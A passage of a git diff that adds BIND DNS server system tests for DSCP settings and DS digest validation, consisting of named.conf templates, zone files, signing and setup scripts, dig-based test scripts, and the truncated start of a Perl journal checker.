ns*/managed-keys.bind* diff --git a/bin/tests/system/dscp/ns1/named.args b/bin/tests/system/dscp/ns1/named.args new file mode 100644 index 0000000..0c955c7 --- /dev/null +++ b/bin/tests/system/dscp/ns1/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns1 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns1/named.conf.in b/bin/tests/system/dscp/ns1/named.conf.in new file mode 100644 index 0000000..e5c7971 --- /dev/null +++ b/bin/tests/system/dscp/ns1/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 46; + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/dscp/ns1/root.db b/bin/tests/system/dscp/ns1/root.db new file mode 100644 index 0000000..9d473e2 --- /dev/null +++ b/bin/tests/system/dscp/ns1/root.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +. SOA ns1.nil-servers. marka.isc.org. 1 3600 1200 3600000 1200 +. NS ns1.nil-servers. +. NS ns2.nil-servers. +ns1.nil-servers. A 10.53.0.1 +ns2.nil-servers. A 10.53.0.2 +xxx.example. A 10.53.0.1 +xxx.tld. A 10.53.0.1 diff --git a/bin/tests/system/dscp/ns2/named.args b/bin/tests/system/dscp/ns2/named.args new file mode 100644 index 0000000..ff501a8 --- /dev/null +++ b/bin/tests/system/dscp/ns2/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns2 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns2/named.conf.in b/bin/tests/system/dscp/ns2/named.conf.in new file mode 100644 index 0000000..ca835c8 --- /dev/null +++ b/bin/tests/system/dscp/ns2/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 46; + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type secondary; + file "root.bk"; + primaries { 10.53.0.1; }; +}; diff --git a/bin/tests/system/dscp/ns3/hint.db b/bin/tests/system/dscp/ns3/hint.db new file mode 100644 index 0000000..875a407 --- /dev/null +++ b/bin/tests/system/dscp/ns3/hint.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +. NS ns1.nil-servers. +. NS ns2.nil-servers. +ns1.nil-servers. A 10.53.0.1 +ns2.nil-servers. A 10.53.0.2 diff --git a/bin/tests/system/dscp/ns3/named.args b/bin/tests/system/dscp/ns3/named.args new file mode 100644 index 0000000..3d1981f --- /dev/null +++ b/bin/tests/system/dscp/ns3/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns3 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns3/named.conf.in b/bin/tests/system/dscp/ns3/named.conf.in new file mode 100644 index 0000000..38d4985 --- /dev/null +++ b/bin/tests/system/dscp/ns3/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 46; + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + notify yes; + recursion yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "hint.db"; +}; diff --git a/bin/tests/system/dscp/ns4/named.args b/bin/tests/system/dscp/ns4/named.args new file mode 100644 index 0000000..277a47b --- /dev/null +++ b/bin/tests/system/dscp/ns4/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns4 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns4/named.conf.in b/bin/tests/system/dscp/ns4/named.conf.in new file mode 100644 index 0000000..8c8ca4f --- /dev/null +++ b/bin/tests/system/dscp/ns4/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 47; + query-source dscp 46 address 10.53.0.4; + notify-source 10.53.0.4 dscp 46; + transfer-source 10.53.0.4 dscp 46; + port @PORT@; + pid-file "named.pid"; + listen-on dscp 46 { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/dscp/ns4/root.db b/bin/tests/system/dscp/ns4/root.db new file mode 100644 index 0000000..cb3b395 --- /dev/null +++ b/bin/tests/system/dscp/ns4/root.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +. SOA ns4.nil-servers. marka.isc.org. 1 3600 1200 3600000 1200 +. NS ns4.nil-servers. +. NS ns5.nil-servers. +ns4.nil-servers. A 10.53.0.4 +ns5.nil-servers. A 10.53.0.5 +xxx.example. A 10.53.0.1 +xxx.tld. A 10.53.0.1 diff --git a/bin/tests/system/dscp/ns5/named.args b/bin/tests/system/dscp/ns5/named.args new file mode 100644 index 0000000..c678163 --- /dev/null +++ b/bin/tests/system/dscp/ns5/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns5 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns5/named.conf.in b/bin/tests/system/dscp/ns5/named.conf.in new file mode 100644 index 0000000..2d1db3c --- /dev/null +++ b/bin/tests/system/dscp/ns5/named.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 47; + query-source dscp 46 address 10.53.0.5; + notify-source 10.53.0.5 dscp 46; + transfer-source 10.53.0.5 dscp 46; + alt-transfer-source 10.53.0.5 dscp 46; + port @PORT@; + pid-file "named.pid"; + listen-on dscp 46 { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type secondary; + file "root.bk"; + primaries { 10.53.0.4; }; +}; diff --git a/bin/tests/system/dscp/ns6/hint.db b/bin/tests/system/dscp/ns6/hint.db new file mode 100644 index 0000000..c2c51f2 --- /dev/null +++ b/bin/tests/system/dscp/ns6/hint.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +. NS ns4.nil-servers. +. NS ns5.nil-servers. +ns4.nil-servers. A 10.53.0.4 +ns5.nil-servers. A 10.53.0.5 diff --git a/bin/tests/system/dscp/ns6/named.args b/bin/tests/system/dscp/ns6/named.args new file mode 100644 index 0000000..283cf22 --- /dev/null +++ b/bin/tests/system/dscp/ns6/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns6 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns6/named.conf.in b/bin/tests/system/dscp/ns6/named.conf.in new file mode 100644 index 0000000..94c1b59 --- /dev/null +++ b/bin/tests/system/dscp/ns6/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 47; + query-source dscp 46 address 10.53.0.6; + notify-source 10.53.0.6 dscp 46; + transfer-source 10.53.0.6 dscp 46; + port @PORT@; + pid-file "named.pid"; + listen-on dscp 46 { 10.53.0.6; }; + listen-on-v6 { none; }; + notify yes; + recursion yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "hint.db"; +}; diff --git a/bin/tests/system/dscp/ns7/named.args b/bin/tests/system/dscp/ns7/named.args new file mode 100644 index 0000000..4ccf38e --- /dev/null +++ b/bin/tests/system/dscp/ns7/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dscp-ns7 -X named.lock -g -U 4 -T maxcachesize=2097152 -T dscp=46 diff --git a/bin/tests/system/dscp/ns7/named.conf.in b/bin/tests/system/dscp/ns7/named.conf.in new file mode 100644 index 0000000..cbf7096 --- /dev/null +++ b/bin/tests/system/dscp/ns7/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dscp 47; + query-source dscp 46 address 10.53.0.7; + notify-source 10.53.0.7 dscp 47; + transfer-source 10.53.0.7 dscp 47; + alt-transfer-source 10.53.0.7 dscp 47; + port @PORT@; + pid-file "named.pid"; + listen-on dscp 46 { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type secondary; + file "root.bk"; + transfer-source 10.53.0.7 dscp 46; + notify-source 10.53.0.7 dscp 46; + alt-transfer-source 10.53.0.7 dscp 46; + primaries { 10.53.0.4; }; +}; diff --git a/bin/tests/system/dscp/setup.sh b/bin/tests/system/dscp/setup.sh new file mode 100644 index 0000000..5cc2958 --- /dev/null +++ b/bin/tests/system/dscp/setup.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf diff --git a/bin/tests/system/dscp/tests.sh b/bin/tests/system/dscp/tests.sh new file mode 100644 index 0000000..d6b0824 --- /dev/null +++ b/bin/tests/system/dscp/tests.sh @@ -0,0 +1,42 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest -p ${PORT}" + +status=0 + +# +# 10.53.0.1 10.53.0.2 10.53.0.3 have a global dscp setting; +# 10.53.0.4 10.53.0.5 10.53.0.6 have dscp set in option *-source clauses; +# 10.53.0.7 has dscp set in zone *-source clauses; +# +for server in 10.53.0.1 10.53.0.2 10.53.0.3 10.53.0.4 10.53.0.5 \ + 10.53.0.6 10.53.0.7 +do + echo_i "testing root SOA lookup at $server" + for i in 0 1 2 3 4 5 6 7 8 9 + do + ret=0 + $DIG $DIGOPTS @$server soa . > dig.out.$server + grep "status: NOERROR" dig.out.$server > /dev/null || ret=1 + test $ret = 0 && break + sleep 1 + done + test $ret = 0 || { echo_i "failed"; status=`expr $status + $ret`; } +done + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dsdigest/clean.sh b/bin/tests/system/dsdigest/clean.sh new file mode 100644 index 0000000..172cf1e --- /dev/null +++ b/bin/tests/system/dsdigest/clean.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f supported +rm -f */K* */dsset-* */*.signed */trusted.conf +rm -f ns1/root.db +rm -f ns1/signer.err +rm -f ns2/good.db ns2/bad.db +rm -f dig.out* +rm -f */named.conf +rm -f */named.run +rm -f */named.memstats +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/dsdigest/ns1/named.conf.in b/bin/tests/system/dsdigest/ns1/named.conf.in new file mode 100644 index 0000000..da27c58 --- /dev/null +++ b/bin/tests/system/dsdigest/ns1/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dsdigest/ns1/root.db.in b/bin/tests/system/dsdigest/ns1/root.db.in new file mode 100644 index 0000000..30c61e9 --- /dev/null +++ b/bin/tests/system/dsdigest/ns1/root.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2012062000 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +good. NS ns2.good. +ns2.good. A 10.53.0.2 +bad. NS ns2.bad. +ns2.bad. A 10.53.0.2 diff --git a/bin/tests/system/dsdigest/ns1/sign.sh b/bin/tests/system/dsdigest/ns1/sign.sh new file mode 100644 index 0000000..567d92f --- /dev/null +++ b/bin/tests/system/dsdigest/ns1/sign.sh @@ -0,0 +1,37 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +infile=root.db.in +zonefile=root.db + +(cd ../ns2 && $SHELL sign.sh) + +cp ../ns2/dsset-good$TP . +cp ../ns2/dsset-bad$TP . + +key1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +key2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) + +cat $infile $key1.key $key2.key > $zonefile + +$SIGNER -P -g -o $zone $zonefile > /dev/null + +# Configure the resolving server with a static key. +keyfile_to_static_ds $key2 > trusted.conf +cp trusted.conf ../ns2/trusted.conf +cp trusted.conf ../ns3/trusted.conf +cp trusted.conf ../ns4/trusted.conf diff --git a/bin/tests/system/dsdigest/ns2/bad.db.in b/bin/tests/system/dsdigest/ns2/bad.db.in new file mode 100644 index 0000000..c5e8c83 --- /dev/null +++ b/bin/tests/system/dsdigest/ns2/bad.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 diff --git a/bin/tests/system/dsdigest/ns2/good.db.in b/bin/tests/system/dsdigest/ns2/good.db.in new file mode 100644 index 0000000..c5e8c83 --- /dev/null +++ b/bin/tests/system/dsdigest/ns2/good.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 diff --git a/bin/tests/system/dsdigest/ns2/named.conf.in b/bin/tests/system/dsdigest/ns2/named.conf.in new file mode 100644 index 0000000..d3fd750 --- /dev/null +++ b/bin/tests/system/dsdigest/ns2/named.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "good" { + type primary; + file "good.db.signed"; +}; + +zone "bad" { + type primary; + file "bad.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dsdigest/ns2/sign.sh b/bin/tests/system/dsdigest/ns2/sign.sh new file mode 100644 index 0000000..d86c717 --- /dev/null +++ b/bin/tests/system/dsdigest/ns2/sign.sh @@ -0,0 +1,44 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone1=good +infile1=good.db.in +zonefile1=good.db +zone2=bad +infile2=bad.db.in +zonefile2=bad.db + +keyname11=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone1) +keyname12=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone1) +keyname21=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone2) +keyname22=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone2) + +cat $infile1 $keyname11.key $keyname12.key >$zonefile1 +cat $infile2 $keyname21.key $keyname22.key >$zonefile2 + +$SIGNER -P -g -o $zone1 $zonefile1 > /dev/null +$SIGNER -P -g -o $zone2 $zonefile2 > /dev/null + +DSFILENAME1=dsset-${zone1}${TP} +DSFILENAME2=dsset-${zone2}${TP} +$DSFROMKEY -a SHA-256 $keyname12 > $DSFILENAME1 +$DSFROMKEY -a SHA-256 $keyname22 > $DSFILENAME2 + +algo=SHA-384 + +$DSFROMKEY -a $algo $keyname12 >> $DSFILENAME1 +$DSFROMKEY -a $algo $keyname22 > $DSFILENAME2 + diff --git a/bin/tests/system/dsdigest/ns3/named.conf.in b/bin/tests/system/dsdigest/ns3/named.conf.in new file mode 100644 index 0000000..a2b105c --- /dev/null +++ b/bin/tests/system/dsdigest/ns3/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + dnssec-must-be-secure . yes; + /* only SHA-256 is enabled */ + disable-ds-digests . { SHA-1; SHA-384; 5; 6; 7; 8; 9; }; + +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dsdigest/ns4/named.conf.in b/bin/tests/system/dsdigest/ns4/named.conf.in new file mode 100644 index 0000000..e43763b --- /dev/null +++ b/bin/tests/system/dsdigest/ns4/named.conf.in @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + /* only SHA-256 is enabled */ + disable-ds-digests . { SHA-1; SHA-384; 5; 6; 7; 8; 9; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dsdigest/setup.sh b/bin/tests/system/dsdigest/setup.sh new file mode 100644 index 0000000..eddbf6b --- /dev/null +++ b/bin/tests/system/dsdigest/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf + +cd ns1 && $SHELL sign.sh diff --git a/bin/tests/system/dsdigest/tests.sh b/bin/tests/system/dsdigest/tests.sh new file mode 100644 index 0000000..c1b5661 --- /dev/null +++ b/bin/tests/system/dsdigest/tests.sh @@ -0,0 +1,54 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" + +# Check the good. domain + +echo_i "checking that validation with enabled digest types works" +ret=0 +$DIG $DIGOPTS a.good. @10.53.0.3 a > dig.out.good || ret=1 +grep "status: NOERROR" dig.out.good > /dev/null || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.good > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Check the bad. domain + +echo_i "checking that validation with no supported digest types and must-be-secure results in SERVFAIL" +ret=0 +$DIG $DIGOPTS a.bad. @10.53.0.3 a > dig.out.bad || ret=1 +grep "SERVFAIL" dig.out.bad > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that validation with no supported digest algorithms results in insecure" +ret=0 +$DIG $DIGOPTS bad. @10.53.0.4 ds > dig.out.ds || ret=1 +grep "NOERROR" dig.out.ds > /dev/null || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.ds > /dev/null || ret=1 +$DIG $DIGOPTS a.bad. @10.53.0.4 a > dig.out.insecure || ret=1 +grep "NOERROR" dig.out.insecure > /dev/null || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.insecure > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +echo_i "exit status: $status" + +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dupsigs/check_journal.pl b/bin/tests/system/dupsigs/check_journal.pl new file mode 100644 index 0000000..99bf690 --- /dev/null +++ b/bin/tests/system/dupsigs/check_journal.pl @@ -0,0 +1,211 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +sub process_changeset; + +my @changeset; + +while( my $line = <> ) { + chomp $line; + + if( $line =~ 